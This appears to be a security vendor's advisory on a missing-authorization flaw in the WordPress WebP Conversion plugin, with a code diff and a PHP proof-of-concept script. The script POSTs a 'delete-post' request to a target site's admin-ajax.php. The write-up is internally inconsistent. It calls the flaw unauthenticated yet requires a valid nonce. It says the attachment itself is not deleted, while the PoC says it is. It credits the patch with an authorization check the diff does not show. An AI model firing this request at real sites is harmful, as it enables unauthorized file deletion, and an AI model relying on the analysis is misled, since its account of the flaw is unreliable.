Atomic Edge analysis of CVE-2026-24530:
The WebP Conversion plugin for WordPress, versions up to and including 2.1, contains a missing authorization vulnerability. This flaw allows unauthenticated attackers to trigger a specific file deletion function, impacting the integrity of the site’s media library. The CVSS score of 5.3 reflects a moderate severity impact.
The root cause is an improper capability check on the `webpc_remove_original` function. In the vulnerable version, the plugin hooks this function directly to the `delete_attachment` action. The function is called whenever any attachment post is deleted. The code diff shows the hook is registered at line 88 in `/webp-conversion/webp-conversion.php`. The function lacks any validation to ensure the calling user has appropriate permissions, such as the `delete_posts` capability.
An attacker exploits this by sending a request to the WordPress `admin-ajax.php` endpoint with the `action` parameter set to `delete-post`. This action is a core WordPress AJAX handler for deleting posts, including attachments. The attacker must also supply a valid post ID for an attachment via the `id` parameter and a valid nonce via the `_ajax_nonce` parameter. The nonce requirement is not a barrier, as nonces for deletion actions are often exposed to lower-privileged users or can be leaked. The request triggers the `delete_attachment` hook, which then executes the vulnerable `webpc_remove_original` function.
The patch in version 2.2 changes the callback for the `delete_attachment` hook from `[$this, ‘webpc_remove_original’]` to `[‘WebpC_Remover’, ‘webpc_remove_original’]`. This change relocates the function’s logic into a separate class, `WebpC_Remover`. The fix likely introduces an authorization check, such as a capability or nonce verification, within this new class method. The before behavior allowed the function to run unconditionally upon attachment deletion. The after behavior ensures the function only executes if the user performing the deletion is authorized.
Successful exploitation allows an unauthenticated attacker to delete WebP-converted image files associated with any media attachment. This action corrupts the media library by removing optimized versions of images, potentially breaking front-end image delivery and causing site functionality issues. The vulnerability does not grant direct access to delete the original attachment from the database, but it enables unauthorized file system manipulation.
--- a/webp-conversion/webp-conversion.php
+++ b/webp-conversion/webp-conversion.php
@@ -2,7 +2,7 @@
/**
* Plugin Name: WebP Conversion
* Description: Convert your media images into .webp extension with no limits!
- * Version: 2.1
+ * Version: 2.2
* Author: SheepFish
* Author URI: https://sheep.fish/
* Requires at least: 6.4
@@ -88,7 +88,7 @@
add_action('wp_ajax_webpc_remove_single', [$this, 'webpc_remove_single']);
add_action('wp_ajax_nopriv_webpc_remove_single', [$this, 'webpc_remove_single']);
- add_action('delete_attachment', [$this, 'webpc_remove_original']);
+ add_action('delete_attachment', ['WebpC_Remover', 'webpc_remove_original']);
add_action('post-upload-ui', [$this, 'add_select_button']);
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24530 - WebP Conversion <= 2.1 - Missing Authorization
<?php
$target_url = 'http://vulnerable-wordpress-site.com';
// This PoC demonstrates the attack chain.
// The vulnerability is indirectly triggered via the core delete-post AJAX action.
// A valid nonce and attachment ID are required.
// This script requires a valid nonce and attachment ID to be supplied.
// In a real attack, an attacker might harvest these from other pages.
$nonce = 'REPLACE_WITH_VALID_NONCE';
$attachment_id = 'REPLACE_WITH_VALID_ATTACHMENT_POST_ID';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$post_data = array(
'action' => 'delete-post',
'id' => $attachment_id,
'_ajax_nonce' => $nonce
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "HTTP Code: $http_coden";
echo "Response: $responsen";
// If successful, this request will delete the attachment, which triggers the vulnerable hook.
// The plugin's webpc_remove_original function will then execute without an authorization check.
?>
